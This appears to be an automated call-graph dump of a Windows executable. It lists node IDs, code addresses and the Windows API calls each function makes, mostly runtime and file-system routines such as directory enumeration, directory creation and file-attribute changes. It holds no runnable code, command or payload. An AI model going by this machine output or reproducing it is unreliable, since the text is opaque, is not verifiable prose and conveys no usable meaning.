43670->43667 43672 7ff7abc20f6d 43671->43672 43673->43643 43675->43667 43676->43649 43677->43645 43678->43656 43679->43658 43680->42277 43681->42282 43682->42286 43683->42292 43685 7ff7abc3eae4 std::_Lockit::_Lockit 6 API calls 43684->43685 43686 7ff7abc27310 43685->43686 43687 7ff7abc3eae4 std::_Lockit::_Lockit 6 API calls 43686->43687 43692 7ff7abc2735f 43686->43692 43688 7ff7abc27335 43687->43688 43693 7ff7abc3eb5c std::_Lockit::~_Lockit LeaveCriticalSection 43688->43693 43689 7ff7abc273ac 43690 7ff7abc3eb5c std::_Lockit::~_Lockit LeaveCriticalSection 43689->43690 43691 7ff7abc273f0 43690->43691 43694 7ff7abc42770 codecvt 8 API calls 43691->43694 43692->43689 43713 7ff7abc03130 87 API calls 7 library calls 43692->43713 43693->43692 43695 7ff7abc222d3 43694->43695 43703 7ff7abc25710 43695->43703 43697 7ff7abc273be 43698 7ff7abc273c4 43697->43698 43699 7ff7abc27413 43697->43699 43714 7ff7abc3f08c 50 API calls std::_Facet_Register 43698->43714 43715 7ff7abc02bf0 50 API calls 3 library calls 43699->43715 43702 7ff7abc27418 43704 7ff7abc25741 43703->43704 43705 7ff7abc25756 43704->43705 43706 7ff7abc21160 10 API calls 43704->43706 43707 7ff7abc2582f 43705->43707 43710 7ff7abc25864 43705->43710 43706->43705 43708 7ff7abc22313 43707->43708 43716 7ff7abc212c0 RtlPcToFileHeader RaiseException _com_raise_error 43707->43716 43708->42299 43717 7ff7abc449c0 RtlPcToFileHeader RaiseException 43710->43717 43712 7ff7abc258b7 43713->43697 43714->43689 43715->43702 43716->43708 43717->43712 43718->42306 43719->42302 43761 7ff7abc1ee10 43720->43761 43723 7ff7abc1ee10 50 API calls 43724 7ff7abc229ef 43723->43724 43725 7ff7abc1ee10 50 API calls 43724->43725 43726 7ff7abc229fd 43725->43726 43727 7ff7abc1ee10 50 API calls 43726->43727 43728 7ff7abc22a0b 43727->43728 43729 7ff7abc1ec10 50 API calls 43728->43729 43730 7ff7abc22a19 43729->43730 43731 7ff7abc1ee10 50 API calls 43730->43731 43732 7ff7abc22a27 43731->43732 43733 7ff7abc1ee10 50 API calls 43732->43733 43734 7ff7abc22a47 43733->43734 43735 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 43734->43735 43736 7ff7abc22a5b 43735->43736 43737 7ff7abc1ee10 50 API calls 43736->43737 43738 7ff7abc22a84 43737->43738 43739 7ff7abc1ee10 50 API calls 43738->43739 43740 7ff7abc22a95 43739->43740 43741 7ff7abc1ee10 50 API calls 43740->43741 43742 7ff7abc22aa6 43741->43742 43743 7ff7abc1ee10 50 API calls 43742->43743 43744 7ff7abc22ab7 43743->43744 43745 7ff7abc1ee10 50 API calls 43744->43745 43746 7ff7abc22acb 43745->43746 43747 7ff7abc1ec10 50 API calls 43746->43747 43748 7ff7abc22adf 43747->43748 43749 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 43748->43749 43750 7ff7abc22af3 43749->43750 43751 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 43750->43751 43752 7ff7abc22b20 43751->43752 43753 7ff7abc1ec10 50 API calls 43752->43753 43754 7ff7abc22b34 43753->43754 43755 7ff7abc1ec10 50 API calls 43754->43755 43756 7ff7abc22b48 43755->43756 43757 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 43756->43757 43758 7ff7abc22b8f 43757->43758 43759 7ff7abc1ee10 50 API calls 43758->43759 43760 7ff7abc22994 43759->43760 43760->42319 43762 7ff7abc1ee4e 43761->43762 43769 7ff7abc1eea8 43761->43769 43771 7ff7abc25e60 50 API calls 3 library calls 43762->43771 43763 7ff7abc42770 codecvt 8 API calls 43765 7ff7abc1eebc 43763->43765 43765->43723 43766 7ff7abc1ee9d 43772 7ff7abc246a0 47 API calls 2 library calls 43766->43772 43768 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 43770 7ff7abc1ee53 43768->43770 43769->43763 43770->43766 43770->43768 43771->43770 43772->43769 43774->42343 43775->42361 43776->42454 43783 7ff7abc3ea08 QueryPerformanceFrequency 43778->43783 43780 7ff7abc039e2 43784 7ff7abc3e9ec QueryPerformanceCounter 43780->43784 43782 7ff7abc039ea 43782->42495 43783->43780 43784->43782 43833 7ff7abc51824 43785->43833 43788 7ff7abc3e0c6 AreFileApisANSI 43789 7ff7abc07cf3 43788->43789 43790 7ff7abc03ab0 43789->43790 43791 7ff7abc03b04 43790->43791 43792 7ff7abc03bda 43790->43792 43793 7ff7abc03c00 43791->43793 43884 7ff7abc3e0dc MultiByteToWideChar GetLastError 43791->43884 43805 7ff7abc055a0 43792->43805 43888 7ff7abc02800 50 API calls 2 library calls 43793->43888 43796 7ff7abc03c06 43889 7ff7abc02b80 50 API calls _com_raise_error 43796->43889 43798 7ff7abc03b2a 43798->43796 43800 7ff7abc03b45 43798->43800 43885 7ff7abc24730 50 API calls 6 library calls 43798->43885 43886 7ff7abc3e0dc MultiByteToWideChar GetLastError 43800->43886 43803 7ff7abc03bcf 43803->43792 43887 7ff7abc02b80 50 API calls _com_raise_error 43803->43887 43806 7ff7abc055d1 43805->43806 43890 7ff7abc3e440 43806->43890 43809 7ff7abc42770 codecvt 8 API calls 43810 7ff7abc05672 43809->43810 43810->42524 43810->42527 43812 7ff7abc04e57 43811->43812 43813 7ff7abc04ebf 43811->43813 43814 7ff7abc42770 codecvt 8 API calls 43812->43814 43815 7ff7abc3e440 66 API calls 43813->43815 43816 7ff7abc04f6d 43814->43816 43815->43812 43816->42587 43820 7ff7abc04fb0 43817->43820 43819 7ff7abc04ff4 43821 7ff7abc42770 codecvt 8 API calls 43819->43821 43820->43819 43822 7ff7abc04fe7 43820->43822 43939 7ff7abc3e38c FindNextFileW 43820->43939 43823 7ff7abc05046 43821->43823 43942 7ff7abc05270 50 API calls 2 library calls 43822->43942 43823->42587 43825->42587 43826->42587 43827->42542 43828->42541 43838 7ff7abc56f84 GetLastError 43833->43838 43839 7ff7abc56fa8 FlsGetValue 43838->43839 43840 7ff7abc56fc5 FlsSetValue 43838->43840 43841 7ff7abc56fbf 43839->43841 43843 7ff7abc56fb5 43839->43843 43842 7ff7abc56fd7 43840->43842 43840->43843 43841->43840 43864 7ff7abc587c4 43842->43864 43844 7ff7abc57031 SetLastError 43843->43844 43846 7ff7abc5182d 43844->43846 43847 7ff7abc57051 43844->43847 43860 7ff7abc59788 43846->43860 43880 7ff7abc51774 47 API calls __std_fs_directory_iterator_open 43847->43880 43849 7ff7abc57004 FlsSetValue 43853 7ff7abc57010 FlsSetValue 43849->43853 43854 7ff7abc57022 43849->43854 43850 7ff7abc56ff4 FlsSetValue 43852 7ff7abc56ffd 43850->43852 43873 7ff7abc58340 43852->43873 43853->43852 43879 7ff7abc56d34 11 API calls memcpy_s 43854->43879 43858 7ff7abc5702a 43859 7ff7abc58340 __free_lconv_mon 11 API calls 43858->43859 43859->43844 43861 7ff7abc5979d 43860->43861 43862 7ff7abc3e0bd 43860->43862 43861->43862 43883 7ff7abc6348c 47 API calls 3 library calls 43861->43883 43862->43788 43862->43789 43865 7ff7abc587d5 43864->43865 43871 7ff7abc587e3 memcpy_s 43864->43871 43866 7ff7abc58826 43865->43866 43865->43871 43881 7ff7abc51674 11 API calls memcpy_s 43866->43881 43867 7ff7abc5880a HeapAlloc 43869 7ff7abc58824 43867->43869 43867->43871 43870 7ff7abc56fe6 43869->43870 43870->43849 43870->43850 43871->43866 43871->43867 43872 7ff7abc5324c std::_Facet_Register 2 API calls 43871->43872 43872->43871 43874 7ff7abc58345 RtlFreeHeap 43873->43874 43875 7ff7abc58374 43873->43875 43874->43875 43876 7ff7abc58360 GetLastError 43874->43876 43875->43843 43877 7ff7abc5836d __free_lconv_mon 43876->43877 43882 7ff7abc51674 11 API calls memcpy_s 43877->43882 43879->43858 43881->43870 43882->43875 43883->43862 43884->43798 43885->43800 43886->43803 43888->43796 43891 7ff7abc3e482 43890->43891 43893 7ff7abc3e4e3 GetFileAttributesExW 43891->43893 43896 7ff7abc3e548 43891->43896 43921 7ff7abc3e48b 43891->43921 43892 7ff7abc42770 codecvt 8 API calls 43894 7ff7abc055ed 43892->43894 43893->43896 43897 7ff7abc3e4f7 GetLastError 43893->43897 43894->43809 43896->43921 43932 7ff7abc3e770 CreateFileW 43896->43932 43899 7ff7abc3e506 FindFirstFileW 43897->43899 43897->43921 43904 7ff7abc3e51a GetLastError 43899->43904 43905 7ff7abc3e525 FindClose 43899->43905 43900 7ff7abc3e5e6 43903 7ff7abc3e5f5 GetFileInformationByHandleEx 43900->43903 43919 7ff7abc3e693 43900->43919 43901 7ff7abc3e5c6 43902 7ff7abc3e5d1 CloseHandle 43901->43902 43901->43921 43906 7ff7abc3e755 43902->43906 43902->43921 43909 7ff7abc3e60f GetLastError 43903->43909 43910 7ff7abc3e635 43903->43910 43904->43921 43905->43896 43935 7ff7abc51774 47 API calls __std_fs_directory_iterator_open 43906->43935 43907 7ff7abc3e6ae GetFileInformationByHandleEx 43908 7ff7abc3e6e8 43907->43908 43912 7ff7abc3e6c4 GetLastError 43907->43912 43914 7ff7abc3e73b 43908->43914 43915 7ff7abc3e6ff 43908->43915 43913 7ff7abc3e61d CloseHandle 43909->43913 43909->43921 43910->43919 43920 7ff7abc3e656 GetFileInformationByHandleEx 43910->43920 43916 7ff7abc3e6d6 CloseHandle 43912->43916 43912->43921 43917 7ff7abc3e766 43913->43917 43913->43921 43914->43921 43922 7ff7abc3e741 CloseHandle 43914->43922 43918 7ff7abc3e705 CloseHandle 43915->43918 43915->43921 43924 7ff7abc3e760 43916->43924 43925 7ff7abc3e691 43916->43925 43938 7ff7abc51774 47 API calls __std_fs_directory_iterator_open 43917->43938 43918->43906 43918->43921 43919->43907 43919->43908 43920->43919 43927 7ff7abc3e672 GetLastError 43920->43927 43921->43892 43922->43906 43922->43921 43923 7ff7abc3e75a 43936 7ff7abc51774 47 API calls __std_fs_directory_iterator_open 43923->43936 43937 7ff7abc51774 47 API calls __std_fs_directory_iterator_open 43924->43937 43925->43921 43927->43921 43931 7ff7abc3e680 CloseHandle 43927->43931 43931->43923 43931->43925 43933 7ff7abc3e5c0 43932->43933 43934 7ff7abc3e7b2 GetLastError 43932->43934 43933->43900 43933->43901 43934->43933 43940 7ff7abc3e39a 43939->43940 43941 7ff7abc3e3a1 GetLastError 43939->43941 43940->43820 43942->43819 43944 7ff7abc2002a 43943->43944 43945 7ff7abc1ffda 43943->43945 43944->42731 44009 7ff7abc1fdd0 43945->44009 43947 7ff7abc20014 44019 7ff7abc48fe0 43947->44019 44067 7ff7abc3e3ac 43949->44067 43952 7ff7abc287f6 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43952->42731 43953 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43954 7ff7abc2881b 43953->43954 43954->42731 43956 7ff7abc27b60 43955->43956 43962 7ff7abc278ed 43955->43962 44090 7ff7abc262a0 50 API calls 2 library calls 43956->44090 43957 7ff7abc27923 43963 7ff7abc42a38 std::_Facet_Register 50 API calls 43957->43963 43959 7ff7abc27b5b 44089 7ff7abc02370 50 API calls 3 library calls 43959->44089 43960 7ff7abc27b66 43966 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43960->43966 43962->43957 43962->43959 43964 7ff7abc27999 43962->43964 43965 7ff7abc27970 43962->43965 43967 7ff7abc2795d 43962->43967 43963->43967 43969 7ff7abc42a38 std::_Facet_Register 50 API calls 43964->43969 43965->43957 43965->43959 43968 7ff7abc27b6c 43966->43968 43967->43960 44074 7ff7abc28ff0 43967->44074 43969->43967 43984->42731 43985->42731 43987 7ff7abc37b12 43986->43987 43988 7ff7abc38e50 50 API calls 43987->43988 43989 7ff7abc37b1d 43988->43989 43989->42731 43990->42731 43991->42731 43992->42731 44002->42671 44007->42708 44008->42657 44010 7ff7abc1fea2 44009->44010 44011 7ff7abc1fdf3 44009->44011 44012 7ff7abc42770 codecvt 8 API calls 44010->44012 44011->44010 44017 7ff7abc1fdfd 44011->44017 44013 7ff7abc1feb1 44012->44013 44013->43947 44014 7ff7abc42770 codecvt 8 API calls 44015 7ff7abc1fe5e 44014->44015 44015->43947 44016 7ff7abc1fe41 44016->44014 44017->44016 44027 7ff7abc49c48 44017->44027 44020 7ff7abc49010 44019->44020 44053 7ff7abc48ebc 44020->44053 44028 7ff7abc49c78 44027->44028 44035 7ff7abc49998 44028->44035 44030 7ff7abc49cbc 44033 7ff7abc49cd1 44030->44033 44043 7ff7abc489b4 47 API calls 2 library calls 44030->44043 44033->44016 44036 7ff7abc499b8 44035->44036 44037 7ff7abc499e5 44035->44037 44036->44037 44038 7ff7abc499ed 44036->44038 44039 7ff7abc499c2 44036->44039 44037->44030 44042 7ff7abc489b4 47 API calls 2 library calls 44037->44042 44044 7ff7abc498d8 44038->44044 44051 7ff7abc4cc44 47 API calls 2 library calls 44039->44051 44042->44030 44043->44033 44052 7ff7abc498c0 EnterCriticalSection 44044->44052 44051->44037 44054 7ff7abc48ed7 44053->44054 44055 7ff7abc48f05 44053->44055 44066 7ff7abc4cc44 47 API calls 2 library calls 44054->44066 44068 7ff7abc287c2 44067->44068 44069 7ff7abc3e3b6 FindClose 44067->44069 44068->43952 44068->43953 44069->44068 44070 7ff7abc3e3c5 44069->44070 44073 7ff7abc51774 47 API calls __std_fs_directory_iterator_open 44070->44073 44075 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 44074->44075 44076 7ff7abc2900a 44075->44076 44077 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 44076->44077 44078 7ff7abc29018 44077->44078 44079 7ff7abc1ee10 50 API calls 44078->44079 44080 7ff7abc2902d 44079->44080 44081 7ff7abc1ee10 50 API calls 44080->44081 44082 7ff7abc2903b 44081->44082 44089->43956 44090->43960 44108->42738 44110 7ff7abc28b22 44109->44110 44120 7ff7abc28bae 44109->44120 44111 7ff7abc42a38 std::_Facet_Register 50 API calls 44110->44111 44112 7ff7abc28b3a 44111->44112 44113 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 44112->44113 44114 7ff7abc28b57 44113->44114 44115 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 44114->44115 44116 7ff7abc28b65 44115->44116 44117 7ff7abc28af0 50 API calls 44116->44117 44118 7ff7abc28b9c 44117->44118 44119 7ff7abc28af0 50 API calls 44118->44119 44119->44120 44120->42743 44122 7ff7abc056d5 44121->44122 44129 7ff7abc056b9 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 44121->44129 44127 7ff7abc0570f 44122->44127 44219 7ff7abc23b40 50 API calls 6 library calls 44122->44219 44124 7ff7abc42770 codecvt 8 API calls 44125 7ff7abc058c2 44124->44125 44125->42790 44209 7ff7abc1efc0 44127->44209 44128 7ff7abc05856 44128->44129 44130 7ff7abc058db 44128->44130 44129->44124 44131 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44130->44131 44132 7ff7abc058e0 44131->44132 44133 7ff7abc1efc0 50 API calls 44134 7ff7abc057a9 44133->44134 44134->44128 44134->44133 44214 7ff7abc3e314 CreateDirectoryW 44134->44214 44136->42766 44138 7ff7abc206c8 44137->44138 44139 7ff7abc205f6 44137->44139 44222 7ff7abc21520 50 API calls 44138->44222 44144 7ff7abc20609 memcpy_s 44139->44144 44221 7ff7abc24c40 50 API calls 6 library calls 44139->44221 44143 7ff7abc206b7 44143->42844 44144->42844 44145->42844 44147 7ff7abc20717 44146->44147 44152 7ff7abc206ed memcpy_s 44146->44152 44148 7ff7abc20819 44147->44148 44153 7ff7abc2072a 44147->44153 44223 7ff7abc02410 50 API calls std::_Throw_Cpp_error 44148->44223 44149 7ff7abc2077e 44154 7ff7abc42a38 std::_Facet_Register 50 API calls 44149->44154 44151 7ff7abc2081e 44224 7ff7abc02370 50 API calls 3 library calls 44151->44224 44152->42844 44153->44149 44155 7ff7abc207ad 44153->44155 44156 7ff7abc20771 44153->44156 44157 7ff7abc20763 memcpy_s 44153->44157 44154->44157 44159 7ff7abc42a38 std::_Facet_Register 50 API calls 44155->44159 44156->44149 44156->44151 44160 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44157->44160 44162 7ff7abc207fb Concurrency::details::ContextBase::CancellationBeaconStack::Grow 44157->44162 44159->44157 44161 7ff7abc2082a 44160->44161 44162->42844 44163->42844 44165 7ff7abc3e770 __std_fs_open_handle 2 API calls 44164->44165 44166 7ff7abc3e80d 44165->44166 44167 7ff7abc3e813 44166->44167 44170 7ff7abc3e770 __std_fs_open_handle 2 API calls 44166->44170 44176 7ff7abc3e9bb 44166->44176 44168 7ff7abc3e816 SetFileInformationByHandle 44167->44168 44177 7ff7abc3e83c 44167->44177 44169 7ff7abc3e8b8 GetLastError 44168->44169 44168->44177 44171 7ff7abc3e8c5 44169->44171 44170->44167 44171->44177 44225 7ff7abc3e03c SetFileInformationByHandle GetLastError SetFileInformationByHandle GetLastError 44171->44225 44173 7ff7abc3e849 44179 7ff7abc3e884 CloseHandle 44173->44179 44174 7ff7abc3e892 44175 7ff7abc42770 codecvt 8 API calls 44174->44175 44180 7ff7abc3e8a2 44175->44180 44227 7ff7abc51774 47 API calls __std_fs_directory_iterator_open 44176->44227 44177->44173 44177->44174 44177->44179 44178 7ff7abc3e8e3 44178->44177 44183 7ff7abc3e8f5 GetFileInformationByHandleEx 44178->44183 44179->44174 44179->44176 44180->42844 44182 7ff7abc3e9e2 44228 7ff7abc51774 47 API calls __std_fs_directory_iterator_open 44182->44228 44185 7ff7abc3e90e 44183->44185 44186 7ff7abc3e93b 44183->44186 44190 7ff7abc3e912 GetLastError 44185->44190 44187 7ff7abc3e942 SetFileInformationByHandle 44186->44187 44188 7ff7abc3e91b 44186->44188 44187->44185 44191 7ff7abc3e95e 44187->44191 44188->44174 44192 7ff7abc3e925 CloseHandle 44188->44192 44190->44188 44226 7ff7abc3e03c SetFileInformationByHandle GetLastError SetFileInformationByHandle GetLastError 44191->44226 44192->44182 44194 7ff7abc3e936 44192->44194 44194->44174 44195 7ff7abc3e966 44195->44188 44196 7ff7abc3e978 SetFileInformationByHandle 44195->44196 44197 7ff7abc3e9a6 GetLastError 44195->44197 44196->44188 44196->44190 44197->44177 44200->42792 44201->42823 44210 7ff7abc1f023 44209->44210 44213 7ff7abc1efdf memcpy_s 44209->44213 44220 7ff7abc23fa0 50 API calls 6 library calls 44210->44220 44212 7ff7abc1f039 44212->44134 44213->44134 44215 7ff7abc3e339 GetLastError 44214->44215 44216 7ff7abc3e32d 44214->44216 44215->44216 44217 7ff7abc3e34a 44215->44217 44216->44134 44218 7ff7abc3e440 66 API calls 44217->44218 44218->44216 44219->44127 44220->44212 44221->44143 44224->44157 44225->44178 44226->44195 44229->42849 44230->42864 44233 7ff7abc49f07 44232->44233 44234 7ff7abc49ef6 44232->44234 44726 7ff7abc0a870 44725->44726 44727 7ff7abc3e0b4 __std_fs_code_page 48 API calls 44726->44727 44728 7ff7abc0a888 44727->44728 44729 7ff7abc03ab0 52 API calls 44728->44729 44730 7ff7abc0a8ad 44729->44730 44731 7ff7abc0a8db 44730->44731 44732 7ff7abc0ac76 44730->44732 44734 7ff7abc0a918 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 44731->44734 44735 7ff7abc0ac89 44731->44735 44785 7ff7abc04d50 51 API calls _com_raise_error 44732->44785 44737 7ff7abc0ac8f 44734->44737 44738 7ff7abc055a0 66 API calls 44734->44738 44740 7ff7abc0ac9f 44734->44740 44743 7ff7abc0abb5 44734->44743 44744 7ff7abc04f80 52 API calls 44734->44744 44745 7ff7abc0aca5 44734->44745 44747 7ff7abc0acab 44734->44747 44750 7ff7abc24160 50 API calls 44734->44750 44767 7ff7abc03f60 44734->44767 44784 7ff7abc27d80 50 API calls 4 library calls 44734->44784 44736 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44735->44736 44736->44737 44786 7ff7abc04d50 51 API calls _com_raise_error 44737->44786 44738->44734 44741 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44740->44741 44741->44745 44742 7ff7abc42770 codecvt 8 API calls 44746 7ff7abc0ac59 44742->44746 44743->44742 44744->44734 44748 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44745->44748 44746->43105 44787 7ff7abc04c60 50 API calls 3 library calls 44747->44787 44748->44747 44750->44734 44753 7ff7abc0acb3 std::_Locinfo::_Locinfo_ctor 44753->43105 44768 7ff7abc03f8a 44767->44768 44769 7ff7abc3e0b4 __std_fs_code_page 48 API calls 44768->44769 44770 7ff7abc03f96 44769->44770 44771 7ff7abc0401b 44770->44771 44783 7ff7abc0403a 44770->44783 44788 7ff7abc3e124 WideCharToMultiByte WideCharToMultiByte GetLastError WideCharToMultiByte GetLastError 44770->44788 44771->44734 44775 7ff7abc03fd8 44792 7ff7abc02800 50 API calls 2 library calls 44783->44792 44784->44734 44787->44753 44788->44775 45112 7ff7abc39ded 45111->45112 45114 7ff7abc39df7 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 45111->45114 45113 7ff7abc42a38 std::_Facet_Register 50 API calls 45112->45113 45113->45114 45114->43585 45115->43600 45117->43607 45128 7ff7abc49078 45129 7ff7abc49095 45128->45129 45130 7ff7abc49086 GetLastError ExitThread 45128->45130 45131 7ff7abc56f84 __std_fs_code_page 47 API calls 45129->45131 45132 7ff7abc4909a 45131->45132 45139 7ff7abc5676c 45132->45139 45135 7ff7abc490b3 45143 7ff7abc4928c 45135->45143 45140 7ff7abc490a6 45139->45140 45141 7ff7abc5677b 45139->45141 45140->45135 45146 7ff7abc590ec 5 API calls __crtLCMapStringW 45140->45146 45141->45140 45147 7ff7abc58b04 5 API calls __crtLCMapStringW 45141->45147 45148 7ff7abc490e8 45143->45148 45146->45135 45147->45140 45157 7ff7abc570fc GetLastError 45148->45157 45150 7ff7abc49140 ExitThread 45151 7ff7abc49115 45154 7ff7abc49129 45151->45154 45155 7ff7abc49123 CloseHandle 45151->45155 45152 7ff7abc490f9 45152->45150 45152->45151 45174 7ff7abc59138 5 API calls __crtLCMapStringW 45152->45174 45154->45150 45156 7ff7abc49137 FreeLibraryAndExitThread 45154->45156 45155->45154 45156->45150 45158 7ff7abc5713d FlsSetValue 45157->45158 45159 7ff7abc57120 45157->45159 45160 7ff7abc5714f 45158->45160 45171 7ff7abc5712d 45158->45171 45159->45158 45159->45171 45162 7ff7abc587c4 memcpy_s 5 API calls 45160->45162 45161 7ff7abc571a9 SetLastError 45161->45152 45163 7ff7abc5715e 45162->45163 45164 7ff7abc5717c FlsSetValue 45163->45164 45165 7ff7abc5716c FlsSetValue 45163->45165 45166 7ff7abc57188 FlsSetValue 45164->45166 45167 7ff7abc5719a 45164->45167 45168 7ff7abc57175 45165->45168 45166->45168 45175 7ff7abc56d34 11 API calls memcpy_s 45167->45175 45169 7ff7abc58340 __free_lconv_mon 5 API calls 45168->45169 45169->45171 45171->45161 45172 7ff7abc571a2 45173 7ff7abc58340 __free_lconv_mon 5 API calls 45172->45173 45173->45161 45174->45151 45175->45172 45176 7ff7abc05060 45177 7ff7abc05094 45176->45177 45178 7ff7abc1f080 50 API calls 45177->45178 45193 7ff7abc05226 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 45177->45193 45180 7ff7abc050ca 45178->45180 45179 7ff7abc42770 codecvt 8 API calls 45181 7ff7abc05244 45179->45181 45182 7ff7abc24160 50 API calls 45180->45182 45183 7ff7abc050fc 45182->45183 45184 7ff7abc03d40 50 API calls 45183->45184 45185 7ff7abc0510a Concurrency::details::ContextBase::CancellationBeaconStack::Grow 45184->45185 45186 7ff7abc0525d 45185->45186 45199 7ff7abc3e3cc 45185->45199 45188 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 45186->45188 45191 7ff7abc05263 45188->45191 45190 7ff7abc051a4 45194 7ff7abc055a0 66 API calls 45190->45194 45195 7ff7abc0519e 45190->45195 45192 7ff7abc0516b 45192->45195 45196 7ff7abc3e38c 2 API calls 45192->45196 45193->45179 45194->45195 45195->45193 45197 7ff7abc05258 45195->45197 45196->45192 45198 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 45197->45198 45198->45186 45200 7ff7abc3e3ea FindClose 45199->45200 45201 7ff7abc3e3f7 FindFirstFileExW 45199->45201 45200->45201 45202 7ff7abc3e438 45200->45202 45203 7ff7abc05165 45201->45203 45204 7ff7abc3e422 GetLastError 45201->45204 45207 7ff7abc51774 47 API calls __std_fs_directory_iterator_open 45202->45207 45203->45190 45203->45192 45204->45203 45208 7ff7abc200c0 45209 7ff7abc21370 58 API calls 45208->45209 45210 7ff7abc20188 45209->45210 45211 7ff7abc21080 58 API calls 45210->45211 45212 7ff7abc201ba 45211->45212 45218 7ff7abc20f70 45212->45218 45214 7ff7abc20262 45215 7ff7abc20234 45215->45214 45227 7ff7abc449c0 RtlPcToFileHeader RaiseException 45215->45227 45217 7ff7abc202c4 45219 7ff7abc21069 45218->45219 45220 7ff7abc20f91 45218->45220 45219->45215 45228 7ff7abc40c1c 45220->45228 45224 7ff7abc20fbb 45235 7ff7abc23430 86 API calls 5 library calls 45224->45235 45226 7ff7abc20fd9 45226->45215 45227->45217 45230 7ff7abc40c62 45228->45230 45229 7ff7abc20fa1 45229->45219 45234 7ff7abc1fec0 47 API calls codecvt 45229->45234 45230->45229 45236 7ff7abc4c8f0 75 API calls ProcessCodePage 45230->45236 45232 7ff7abc40cb0 45232->45229 45233 7ff7abc48fe0 76 API calls 45232->45233 45233->45229 45234->45224 45235->45226 45236->45232 45237 7ff7abc1d3f0 45238 7ff7abc1d436 45237->45238 45246 7ff7abc20b20 45238->45246 45240 7ff7abc1d447 45242 7ff7abc1d46c 45240->45242 45256 7ff7abc1dd80 45240->45256 45241 7ff7abc1d4bc 45242->45241 45263 7ff7abc449c0 RtlPcToFileHeader RaiseException 45242->45263 45244 7ff7abc1d53e 45247 7ff7abc20b7f 45246->45247 45252 7ff7abc20b4a 45246->45252 45249 7ff7abc21160 10 API calls 45247->45249 45251 7ff7abc20b8d 45247->45251 45248 7ff7abc20b6e 45248->45240 45249->45251 45250 7ff7abc20d12 45250->45240 45251->45250 45265 7ff7abc449c0 RtlPcToFileHeader RaiseException 45251->45265 45252->45248 45264 7ff7abc449c0 RtlPcToFileHeader RaiseException 45252->45264 45255 7ff7abc20dd3 45257 7ff7abc1dd98 45256->45257 45261 7ff7abc1dda4 memcpy_s 45256->45261 45257->45242 45258 7ff7abc1ddb5 memcpy_s 45258->45242 45259 7ff7abc1deee 45259->45258 45262 7ff7abc4c520 _fread_nolock 63 API calls 45259->45262 45260 7ff7abc4c520 _fread_nolock 63 API calls 45260->45261 45261->45258 45261->45259 45261->45260 45262->45258 45263->45244 45264->45251 45265->45255 45266 7ff7abc1d200 45267 7ff7abc1d25d 45266->45267 45271 7ff7abc1d337 45266->45271 45268 7ff7abc20b20 10 API calls 45267->45268 45269 7ff7abc1d284 45268->45269 45270 7ff7abc1d2b4 45269->45270 45277 7ff7abc1db30 45269->45277 45273 7ff7abc1d30d 45270->45273 45288 7ff7abc449c0 RtlPcToFileHeader RaiseException 45270->45288 45287 7ff7abc449c0 RtlPcToFileHeader RaiseException 45271->45287 45275 7ff7abc1d3e6 45278 7ff7abc1db63 45277->45278 45279 7ff7abc1fdd0 78 API calls 45278->45279 45286 7ff7abc1dbbb 45278->45286 45281 7ff7abc1db86 45279->45281 45280 7ff7abc42770 codecvt 8 API calls 45282 7ff7abc1dc29 45280->45282 45283 7ff7abc1dba6 45281->45283 45284 7ff7abc4c858 75 API calls 45281->45284 45281->45286 45282->45270 45283->45286 45289 7ff7abc4be50 45283->45289 45284->45283 45286->45280 45287->45270 45288->45275 45290 7ff7abc4be79 45289->45290 45291 7ff7abc4be64 45289->45291 45290->45291 45292 7ff7abc4be7e 45290->45292 45298 7ff7abc51674 11 API calls memcpy_s 45291->45298 45294 7ff7abc4db84 50 API calls 45292->45294 45296 7ff7abc4be74 45294->45296 45295 7ff7abc4be69 45299 7ff7abc4cd10 47 API calls _invalid_parameter_noinfo 45295->45299 45296->45286 45298->45295 45299->45296 45300 7ff7abc26930 45301 7ff7abc26b6e 45300->45301 45306 7ff7abc2698a 45300->45306 45337 7ff7abc262a0 50 API calls 2 library calls 45301->45337 45303 7ff7abc26b69 45336 7ff7abc02370 50 API calls 3 library calls 45303->45336 45305 7ff7abc26a62 45317 7ff7abc26b0f 45305->45317 45318 7ff7abc26b38 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 45305->45318 45338 7ff7abc493f8 45305->45338 45306->45303 45307 7ff7abc269e8 45306->45307 45308 7ff7abc26a11 45306->45308 45314 7ff7abc269d6 45306->45314 45307->45303 45310 7ff7abc269f5 45307->45310 45311 7ff7abc42a38 std::_Facet_Register 50 API calls 45308->45311 45313 7ff7abc42a38 std::_Facet_Register 50 API calls 45310->45313 45311->45314 45313->45314 45314->45317 45319 7ff7abc28870 45314->45319 45315 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 45316 7ff7abc26b80 45315->45316 45317->45315 45317->45318 45320 7ff7abc42a38 std::_Facet_Register 50 API calls 45319->45320 45321 7ff7abc288b2 45320->45321 45322 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 45321->45322 45323 7ff7abc288d4 45322->45323 45324 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 45323->45324 45325 7ff7abc288e1 45324->45325 45326 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 45325->45326 45327 7ff7abc288ee 45326->45327 45343 7ff7abc491b0 45327->45343 45330 7ff7abc2892b 45333 7ff7abc42770 codecvt 